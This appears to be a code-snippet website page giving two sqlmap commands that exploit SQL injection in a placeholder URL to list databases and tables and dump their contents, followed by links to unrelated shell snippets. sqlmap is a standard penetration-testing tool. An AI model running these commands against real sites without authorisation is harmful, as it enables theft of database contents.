Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

sqlmap enumerate tables in databases

sqlmap -u "http://vulnerableparametersinurl.com?id=1" -d site_database --tables --dump
Comment

sqlmap enumerate databases

sqlmap -u "http://vulnerableparametersinurl.com?id=1" --dbs --dump
Comment

PREVIOUS NEXT
Code Example
Shell :: dbeaver linux 
Shell :: install aws cli mac 
Shell :: install kubectl 
Shell :: git search all branches 
Shell :: keycloak docker 
Shell :: github set branch upstream 
Shell :: how to assign an ad group to a folder mac os terminal 
Shell :: list devices in network 
Shell :: firebase only hosting command 
Shell :: uninstall package ubuntu 
Shell :: fish unset 
Shell :: ubuntu desktop sharing not working teams 
Shell :: how to get kafka version 
Shell :: make git forget a file 
Shell :: how to make a list bash 
Shell :: remove all files inside directory linux 
Shell :: revert vs reset vs restore 
Shell :: pip version ubuntu 
Shell :: stop processes on port 3000 
Shell :: snap install audacity 
Shell :: ssh operation timed out mac 
Shell :: how to commit to github from terminal 
Shell :: bash create folder with spaces 
Shell :: diskpart assign letter 
Shell :: push branch to remote 
Shell :: installing .deb on kali 
Shell :: how to restart network manager in kali 
Shell :: postgres install mac 
Shell :: vim move line down 
Shell :: bash single line if-else condition 
ADD CONTENT
Topic
Content
Source link
Name
9+5 =